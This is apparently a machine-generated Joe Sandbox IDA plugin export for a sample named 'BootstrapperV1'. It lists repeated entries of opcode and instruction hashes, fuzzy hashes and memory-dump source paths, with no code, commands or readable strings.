                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1a29bf97ab4a39b9a0a8ef3d2b4c69f2ae1024945690b6c3666e98bf9c410767
                                              • Instruction ID: efe7d492c8272fdc1a187099785eb2c88ee8550b8166a851947b1e2c53c40b02
                                              • Opcode Fuzzy Hash: 1a29bf97ab4a39b9a0a8ef3d2b4c69f2ae1024945690b6c3666e98bf9c410767
                                              • Instruction Fuzzy Hash: 9051203031AB0E4FE7689B5CD894A7173E1EF99320715077AD08DC3272DA29F8838781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 500e2d3d243c77ee4384fce901cbdad05abfdfacd4f2efacdd2851877dc73f7f
                                              • Instruction ID: 0fb63f3612cbb3c6fab62efa767777559c09e66676c6c4243da653896ea796cb
                                              • Opcode Fuzzy Hash: 500e2d3d243c77ee4384fce901cbdad05abfdfacd4f2efacdd2851877dc73f7f
                                              • Instruction Fuzzy Hash: 4D510A30B1CE1D4FDBA8EA6C90657B937D1EF98750F5102BAF44EC72A6DD18E9418381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 732c71fa3e88001d67d93fd4b094344fc669397598d624661bfc896b2f97dc07
                                              • Instruction ID: cc2f5a0a773107582aa6bff46e57a33ff5cce6c14cec72652d8b10aca596f8a8
                                              • Opcode Fuzzy Hash: 732c71fa3e88001d67d93fd4b094344fc669397598d624661bfc896b2f97dc07
                                              • Instruction Fuzzy Hash: 2851E821B0EBC90FE766977848752647FE1EF56210B0A45FBD489CB1F3DA18AD09C351
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d4204f5b9361b262e8cde9225319134063415194b03fcc5f6a46cc7e85f59be
                                              • Instruction ID: 220e22d3fc9e418d9d7e86163774f865fbb1d2e11263fb1373f00b765f10c19b
                                              • Opcode Fuzzy Hash: 9d4204f5b9361b262e8cde9225319134063415194b03fcc5f6a46cc7e85f59be
                                              • Instruction Fuzzy Hash: 3951E220709A4D4FDBA5EE6C88A5B7537D1EF99710B0111BAD44EC72A6CD24EC42C3A0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 839ac5e12fa7dba11391c0808dd1159a4c9add5a8ce82e5bf5678bd3515ee51c
                                              • Instruction ID: 1efa6a549c0551bfa38064e34fb05c3f6970dd9e50bb3d9020b4663a474e7740
                                              • Opcode Fuzzy Hash: 839ac5e12fa7dba11391c0808dd1159a4c9add5a8ce82e5bf5678bd3515ee51c
                                              • Instruction Fuzzy Hash: 2751E230719B484BDB68DB18C4A5AB6B3E1EFA4300F51467ED44BC72B2DE25F946C781
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6614510906437df5cd849fbc0211a65bbf96bcc11b5a75f82e8ecc57792f57d
                                              • Instruction ID: 6cf2b4cba765f1ee2b7940cfccc48802283b7a4e762b5414c70d3a6bde444427
                                              • Opcode Fuzzy Hash: d6614510906437df5cd849fbc0211a65bbf96bcc11b5a75f82e8ecc57792f57d
                                              • Instruction Fuzzy Hash: 29510670A0EB894FDB64DB6C88A96A87BF1EF59250F0606FDD089CB1B2D924A905C340
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9bdf2380375e42c248f0a2980dee221da51e8198be21338970b0aa266886ceb
                                              • Instruction ID: 562c97f8f46699bb419a593f8cbb5232d034212585187eab832c961219de8678
                                              • Opcode Fuzzy Hash: d9bdf2380375e42c248f0a2980dee221da51e8198be21338970b0aa266886ceb
                                              • Instruction Fuzzy Hash: E6412722B0EA4E0FE7B49AAC54A937537D2EFAD36071642BBD58DC72B2DD149D028350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f294c749cf386267d47d6d908008966cc26cf2ea1a6f86e6f31c5d49c24b372
                                              • Instruction ID: 2c9cd9cc690d0d8702344f2921f7450404e821a86741f68459a519c044fe875c
                                              • Opcode Fuzzy Hash: 2f294c749cf386267d47d6d908008966cc26cf2ea1a6f86e6f31c5d49c24b372
                                              • Instruction Fuzzy Hash: 1F51707060DA4A8FDB98EF1CC465EA937E1EF69304F1504ADE44EC72A6CA35EC42CB40
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 28d714955cb136f233b04f6b0d6557ec6d0c2d7fa124b4712543741f1c7ad41e
                                              • Instruction ID: 203282dcada610ec317a3d23d0da18973682a7b990cb4aa12ed01d8372e03b49
                                              • Opcode Fuzzy Hash: 28d714955cb136f233b04f6b0d6557ec6d0c2d7fa124b4712543741f1c7ad41e
                                              • Instruction Fuzzy Hash: 18517771E1994D5FEBA8DB6CD8597AC73B1FF58341F0002BAD40DD22A1DE396D818B50
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cdda25a1ca01bd6e9e9c72feda21665434ad3b06af5cd774f78d7c0ff061efd1
                                              • Instruction ID: 46278665301505c2384f77d46f3bd39f35062f6d48d9e8332ee17c0a9089c8d2
                                              • Opcode Fuzzy Hash: cdda25a1ca01bd6e9e9c72feda21665434ad3b06af5cd774f78d7c0ff061efd1
                                              • Instruction Fuzzy Hash: DB511F70619B098FD769DB74C0A4BA6B7E1FF59300F51856EC09EC76A6DA34B802CB40
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0c10c040febf1aae69fcdaad279bf06dbde2e8b026a2066be6f432edc75b64e
                                              • Instruction ID: d2b4758c23f5e40a3c885675657e3bdfdec179d7b49bb25470e2764ad0cac6a4
                                              • Opcode Fuzzy Hash: d0c10c040febf1aae69fcdaad279bf06dbde2e8b026a2066be6f432edc75b64e
                                              • Instruction Fuzzy Hash: B3512637E093198FD711AFADB4914E97720EF81339B0603B7C6D48A0A7F72065668790
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8653e0d980a23dca95332e3f3348bfa27621191b26658e8faa28801c84b91d7f
                                              • Instruction ID: f4dbb5cff3a5cdd76e79f424b44f07897f64f15b775742538fef34e8301b8706
                                              • Opcode Fuzzy Hash: 8653e0d980a23dca95332e3f3348bfa27621191b26658e8faa28801c84b91d7f
                                              • Instruction Fuzzy Hash: 8441D362B0FBC90FE7A59A7C18793647FD1EF5A210B0A02FAD498CB1F3D9086909C311
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5d3130097f6d84259d56443427403cd3ceb3d6a6e81680361f18933d8ca4ad1
                                              • Instruction ID: 09d56c0ef439c83e4fafc68d1e35dd8a3942590554b022e370e6b4dfdb071118
                                              • Opcode Fuzzy Hash: c5d3130097f6d84259d56443427403cd3ceb3d6a6e81680361f18933d8ca4ad1
                                              • Instruction Fuzzy Hash: 03411921B0DA4D0FE7A8DB6C9825B757BE1EF99310B0502BED49DC32E7DD18AC428341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bdc954aa1739ac0d44047a27811940cc77329eb546b4ee72b536c83c24ebf207
                                              • Instruction ID: 4a58c39d5829d33a74fc1e309aab40c52005b95afe104d759f2783328a2c1184
                                              • Opcode Fuzzy Hash: bdc954aa1739ac0d44047a27811940cc77329eb546b4ee72b536c83c24ebf207
                                              • Instruction Fuzzy Hash: 7241E532F0EA5D4FE755A7ACA8696E97BE0EF94324F0902B7E44CC72A6DE145D058380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 22291723a289259879b3f231566fc80e77a80b0fe6a69a39ad77167b01634139
                                              • Instruction ID: 0e6548270a07f436974e55f0d78ad8e9371b3ca4a573b986c7ab2dd28c7e9c93
                                              • Opcode Fuzzy Hash: 22291723a289259879b3f231566fc80e77a80b0fe6a69a39ad77167b01634139
                                              • Instruction Fuzzy Hash: AD413A31709A0D0FE7D4EB6CA8657B9B7C1EF98315F4502FAE44CC72B6DD2A59418381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 879cf2aff8835aa7b2e8d72dbf604c629ae259fc1eb7f83cebe086a6ed9f3575
                                              • Instruction ID: d90daf34534094e0c9c8e2527a895d6e5371ec2add5d3d96fc3ef8da38e7fc07
                                              • Opcode Fuzzy Hash: 879cf2aff8835aa7b2e8d72dbf604c629ae259fc1eb7f83cebe086a6ed9f3575
                                              • Instruction Fuzzy Hash: F541D932B0DE0E0FEBA4DAAC94692F977D1FF98261F050277E94CD32B2DD15A9414341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d09f1a9f699a0a67a7234860fe3abf1ec34e54f86434c3a5f1326db09ec89a5
                                              • Instruction ID: f9dab80168e163a8501f1b2def775e7f8ca1d70b4d580332cbc5eacf4a6286cc
                                              • Opcode Fuzzy Hash: 8d09f1a9f699a0a67a7234860fe3abf1ec34e54f86434c3a5f1326db09ec89a5
                                              • Instruction Fuzzy Hash: FC41D130B19E0A4FE768DA38D4A5AA5B3D1FF94300B154A7DD49EC72B5DE29B842C780
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5b154d3e060b3862e0448aab0eed7bc6e6c955133ee3a8190e92fc96252adf1
                                              • Instruction ID: f2a3e8b821f2ab55cb29f69a88d74407589c9a1459213f0ea3190637c11a6272
                                              • Opcode Fuzzy Hash: f5b154d3e060b3862e0448aab0eed7bc6e6c955133ee3a8190e92fc96252adf1
                                              • Instruction Fuzzy Hash: FD41E221B0EB890FD7AADB6C48746743FE1EF5A250B0A41FBE089CB1F3D9189D458361
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0e389159278bf4400b3ec70f89a4a06c6d2a370252b0140057b64f7f15eb927
                                              • Instruction ID: 0af0dd89f6e9da8792d2847748d3eccb9d71e1c0160f7d9ccd2198d24103d3eb
                                              • Opcode Fuzzy Hash: c0e389159278bf4400b3ec70f89a4a06c6d2a370252b0140057b64f7f15eb927
                                              • Instruction Fuzzy Hash: C3412671A0EAC95FE7559BB894656A47FF1EF5A310F0801FAD0CDCB2B3CA2D98068341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9b457a7803397c95347e769965d324b0d29dc96d1213cc63b763f68a67dafd2
                                              • Instruction ID: a017fea14d533d470850ad83462bb70c3dd93031a641a7583840d21a609afa4d
                                              • Opcode Fuzzy Hash: f9b457a7803397c95347e769965d324b0d29dc96d1213cc63b763f68a67dafd2
                                              • Instruction Fuzzy Hash: 9D31C632F0EA5D4FD755EB5CA8696E97BE1EF99320F0902B7E44CC72A6DE145C058380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8ea0f94cdb9ec9895f91118f7c04885dcc2e0c0ca419f20142889f51110b4bc2
                                              • Instruction ID: f6ea80f7139937a32f4b540f46d1ebae33fb9a52a80ab8ade2b780c8b7ebf542
                                              • Opcode Fuzzy Hash: 8ea0f94cdb9ec9895f91118f7c04885dcc2e0c0ca419f20142889f51110b4bc2
                                              • Instruction Fuzzy Hash: 9F41E461A0E68D0FE756D7BC686A1F97BF1DF5A210B0901FBD089C71B3C9186942C751
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97ff5a6ef9e7c66c25f15d29a421ad1e849ad33cbaf19e1a9c8d1c27608bc527
                                              • Instruction ID: 39c16b4b04278cdb00ad1ddcb3bace82ca28e895cbaf326f2104ed81ea256c8c
                                              • Opcode Fuzzy Hash: 97ff5a6ef9e7c66c25f15d29a421ad1e849ad33cbaf19e1a9c8d1c27608bc527
                                              • Instruction Fuzzy Hash: B231B532F0EA5C4FD765EB5C98696E97BE1EF99220F0502B7E44CC72A6DE145C058381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0f9d9c2a881431142511ccd3a004dfb5024227dbf7e6692c1ae8dd8330d3c74
                                              • Instruction ID: bd6747ed1bd30469297e8307f0efabec0b03ce8f9015e5e96e4531f67033533c
                                              • Opcode Fuzzy Hash: a0f9d9c2a881431142511ccd3a004dfb5024227dbf7e6692c1ae8dd8330d3c74
                                              • Instruction Fuzzy Hash: 8E31F631B0EA4D0FE7A8DF6C98686B977D0FF58210F4106BBD48DC72B2DE2569018740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5520f7385a3baa5bbd6889303f7643629ebdca6c15415023c698b425e3db1c8a
                                              • Instruction ID: 2bad7d2ba0b1e2b2ab23f47312f4d4a8abefa85b502f0379002f4cb236c0fef7
                                              • Opcode Fuzzy Hash: 5520f7385a3baa5bbd6889303f7643629ebdca6c15415023c698b425e3db1c8a
                                              • Instruction Fuzzy Hash: 9A317C32F19E1C4FEBA4EA5C94697A973E1FB98320F0502BBE44DD72A5DE14AC024380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc7e6d1eb5fa216c1eb544ae77fec4fd37ec1a4813afa0d47fbbed8da4e16350
                                              • Instruction ID: 804ccfe43c7a2c4894dcf1e993e930bc2e49482377b32fd6552b7a1d0c3717c8
                                              • Opcode Fuzzy Hash: cc7e6d1eb5fa216c1eb544ae77fec4fd37ec1a4813afa0d47fbbed8da4e16350
                                              • Instruction Fuzzy Hash: 5531C772B0DA4D4FEB959B6C58355A937E1EF95710F0501BBE09DC32B2EE15A9028381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c48b5a680e786ed161ae8ad4ffd2b21263bd46e88d567fbf314a0dd05fd6ee3
                                              • Instruction ID: 32cc4d9ae3d8b44bc64f38ccb0987e816c6abe35b956b036afede707eebb33ad
                                              • Opcode Fuzzy Hash: 3c48b5a680e786ed161ae8ad4ffd2b21263bd46e88d567fbf314a0dd05fd6ee3
                                              • Instruction Fuzzy Hash: 3631392160EBC94FD766DB688875A743FE0EF52250B0A42FBD489CB1F3DA085C458352
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9767a0b47564ecfa1a060bce6fd789da8d9d9baf4d2d3feab047ae356c339c06
                                              • Instruction ID: 3d9abf80241430fa405051d4b4e966c7bb3c4046ce528ae0d5978901350bff76
                                              • Opcode Fuzzy Hash: 9767a0b47564ecfa1a060bce6fd789da8d9d9baf4d2d3feab047ae356c339c06
                                              • Instruction Fuzzy Hash: 1E319530B0EB1E4BE7B9A7A450356B972D2EF48714F51067ED48D832F6DE3AFA458240
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b8ab6b3c20e35505baae7e8c19f95890585718fa45ba332d779be6d1713d8a2d
                                              • Instruction ID: 8c08677fa81340c2372b0a1beec593ed4683d4ffdc390c8602db73f86d3e6ec9
                                              • Opcode Fuzzy Hash: b8ab6b3c20e35505baae7e8c19f95890585718fa45ba332d779be6d1713d8a2d
                                              • Instruction Fuzzy Hash: D531D761B1EB4D0BEBA59E6C54B57643BD2EF9A304F4612B8E06DC32F2DD15A8028300
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0faf3f8acc34ecca046b92cba11445b68045c4509be9d08166dc1dcc8f489261
                                              • Instruction ID: f780d49a99298d71425a5de63b7ddd34fece9ee2a91ed191f165eb33e966eb61
                                              • Opcode Fuzzy Hash: 0faf3f8acc34ecca046b92cba11445b68045c4509be9d08166dc1dcc8f489261
                                              • Instruction Fuzzy Hash: 48318E32A0FF8A0FE7B5966844A8AE57BE1EF5475070903BBD089C30F3ED1878468760
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4fb6eaf6647559e91b183d30329e84b6f96a420e792d5d21c437f8734fb6ba20
                                              • Instruction ID: 21de5f0f37da9bab29b94b5b1663d0926f705407f1a0552d41ac4f17bd881e8d
                                              • Opcode Fuzzy Hash: 4fb6eaf6647559e91b183d30329e84b6f96a420e792d5d21c437f8734fb6ba20
                                              • Instruction Fuzzy Hash: 6631B47199E3951FD31647646C275F27BA4DF42329B1A02F7D498CB9F3C90E2A838362
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 309f70cab71696b88487c4530052b449c8f6be14b3d7f14d404739384f8f2575
                                              • Instruction ID: 7d03b3732012a285748cc228836e844265902b842fb718d2b26d86c4c096d8a3
                                              • Opcode Fuzzy Hash: 309f70cab71696b88487c4530052b449c8f6be14b3d7f14d404739384f8f2575
                                              • Instruction Fuzzy Hash: 54315821F0AA4D0FD7A4DBAC98247B93BE1EF95210B4541FAE89DC72B6DD1859028391
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db8f205766eb48c3dcb388d0d9f6947eeaaf256accbd44a11a07a8af8c5b4af5
                                              • Instruction ID: 1624912c779603944c71d98f70648b16fdeefa320988281f621382f64d3edd0d
                                              • Opcode Fuzzy Hash: db8f205766eb48c3dcb388d0d9f6947eeaaf256accbd44a11a07a8af8c5b4af5
                                              • Instruction Fuzzy Hash: 2621BF22B1EE0E0FFAA8E65C6474B7933C6EBD8291B51427AE44EC32A5ED15EC024350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96c5dbb0216296d0d49c5e19c505d81147a9dbc01c3e059af5a87f6b9e3aa4dd
                                              • Instruction ID: 66684f06b3c4cb6ccfca35d8b51586b1e73dd2cf40048d97205b836202560081
                                              • Opcode Fuzzy Hash: 96c5dbb0216296d0d49c5e19c505d81147a9dbc01c3e059af5a87f6b9e3aa4dd
                                              • Instruction Fuzzy Hash: 3E31F612B0D6560AE32973EDB0299FD3790DF81326F9F02BBD19D890E79C192645C2A5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dccba0130437889abac72e2ff1e4e8a26a79a4e8ef2925dcc53a573e859e1a7b
                                              • Instruction ID: 6627e6a1104d54ddf1cf42e5d34792b3e5541cb957e131702364f6c806d2bb27
                                              • Opcode Fuzzy Hash: dccba0130437889abac72e2ff1e4e8a26a79a4e8ef2925dcc53a573e859e1a7b
                                              • Instruction Fuzzy Hash: 4D31B330B09B1A4BE368EB7894697B2B7D0FF45319F15067AD4CEC62A6DE24F541C740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 49b1c798872e95c4efe93c54f0b5336864231a42724317b9796aee71d7c80ffa
                                              • Instruction ID: 67f7ee5e03b3db7a362f90a6ea2d00c9def15c6b60d33bbc965b84c6c633a612
                                              • Opcode Fuzzy Hash: 49b1c798872e95c4efe93c54f0b5336864231a42724317b9796aee71d7c80ffa
                                              • Instruction Fuzzy Hash: D0314C31A09B8D4FDB65DB6888255A97BF1EF9A340F0502EBD05CD72F3DB295D028741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
